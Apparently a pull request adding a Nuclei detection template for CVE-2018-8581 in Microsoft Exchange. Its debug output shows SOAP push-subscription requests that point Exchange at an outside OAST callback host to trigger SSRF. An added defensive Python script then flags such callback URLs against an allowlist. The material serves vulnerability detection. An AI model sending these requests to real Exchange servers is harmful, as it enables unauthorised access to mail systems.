This PR adds a high-fidelity Nuclei template for CVE-2018-8581, an elevation of privilege vulnerability in Microsoft Exchange Server. The template performs active validation by triggering an SSRF interaction via a Push Notification subscription request to the EWS endpoint.
Key Features:
- Uses interactsh for reliable Out-of-Band (OAST) detection.
- Implements strict matchers: Requires both a successful m:SubscribeResponse and an OAST interaction to prevent false positives.
- Includes comprehensive metadata (CPE, CVSS, and Shodan queries).
/claim #14576
```
POST /EWS/Exchange.asmx HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Connection: close
Content-Length: 835
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://schemas.microsoft.com/exchange/services/2006/messages/CreateSubscription"
Accept-Encoding: gzip

http://schemas.xmlsoap.org/soap/envelope/" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"> soap:Header/ soap:Body NewMailEvent AQAAAFyXNzEjRqTzFE+TLoDSw9T+/w== 1 https://d5n7rpoppn62b618k7a0ip8c75c7hrwn4.oast.pro/

[DBG] [CVE-2018-8581] Dumped HTTP response https://example.com/EWS/Exchange.asmx

HTTP/1.1 405 Not Allowed
Connection: close
Transfer-Encoding: chunked
Cf-Ray: 9c088a51cc78a70d-DEL
Content-Type: text/html
Date: Mon, 19 Jan 2026 18:54:23 GMT
Server: cloudflare
Vary: Accept-Encoding

<title>Example Domain</title><style>body{background:#eee;width:60vw;margin:15vh auto;font-family:system-ui,sans-serif}h1{font-size:1.5em}div{opacity:0.8}a:link,a:visited{color:#348}</style>
This domain is for use in documentation examples without needing permission. Avoid use in operations.

POST /EWS/PushSubscription.svc HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Connection: close
Content-Length: 835
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://schemas.microsoft.com/exchange/services/2006/messages/CreateSubscription"
Accept-Encoding: gzip

http://schemas.xmlsoap.org/soap/envelope/" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"> soap:Header/ soap:Body NewMailEvent AQAAAFyXNzEjRqTzFE+TLoDSw9T+/w== 1 https://d5n7rpoppn62b618k7a07ksubyz5dc7aa.oast.pro/

<title>Example Domain</title><style>body{background:#eee;width:60vw;margin:15vh auto;font-family:system-ui,sans-serif}h1{font-size:1.5em}div{opacity:0.8}a:link,a:visited{color:#348}</style>
This domain is for use in documentation examples without needing permission. Avoid use in operations.
```
kingerharshit
@kingerharshit
ProjectDiscovery
@projectdiscovery
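
A defender-side counterpart to the request type shown in the debug output, as an added example that is not part of the PR or of the Nuclei template: it parses captured EWS SOAP bodies (for instance from a reverse proxy log) and flags push-subscription callback URLs whose host is not on an allowlist. The allowlist host and the sample request are constructed for illustration; the element names follow the public EWS schema.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Namespace URIs used by EWS SOAP requests.
NS = {
    "t": "http://schemas.microsoft.com/exchange/services/2006/types",
    "m": "http://schemas.microsoft.com/exchange/services/2006/messages",
}
# Assumption: hosts that legitimately receive EWS push notifications here.
ALLOWED_CALLBACK_HOSTS = {"notify.corp.example"}

# Constructed sample request; {url} is filled in per case.
SAMPLE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
  xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
 <soap:Body><m:Subscribe><m:PushSubscriptionRequest>
  <t:FolderIds><t:DistinguishedFolderId Id="inbox"/></t:FolderIds>
  <t:EventTypes><t:EventType>NewMailEvent</t:EventType></t:EventTypes>
  <t:StatusFrequency>1</t:StatusFrequency>
  <t:URL>{url}</t:URL>
 </m:PushSubscriptionRequest></m:Subscribe></soap:Body></soap:Envelope>"""

def push_callbacks(soap_body):
    """Return every push-subscription callback URL in one EWS request body."""
    try:
        # For untrusted input in production, parse with defusedxml instead.
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return []  # not XML (e.g. an HTML error page): nothing to inspect
    urls = root.findall(".//m:PushSubscriptionRequest/t:URL", NS)
    return [(u.text or "").strip() for u in urls]

def flag_request(soap_body, allowed=ALLOWED_CALLBACK_HOSTS):
    """Return the callback URLs whose host is not on the allowlist."""
    flagged = []
    for url in push_callbacks(soap_body):
        host = (urlsplit(url).hostname or "").lower()
        if host not in allowed:
            flagged.append(url)
    return flagged

if __name__ == "__main__":
    for u in ("https://callback.invalid/x", "https://notify.corp.example/ews"):
        print(u, "->", flag_request(SAMPLE.format(url=u)) or "allowed")
```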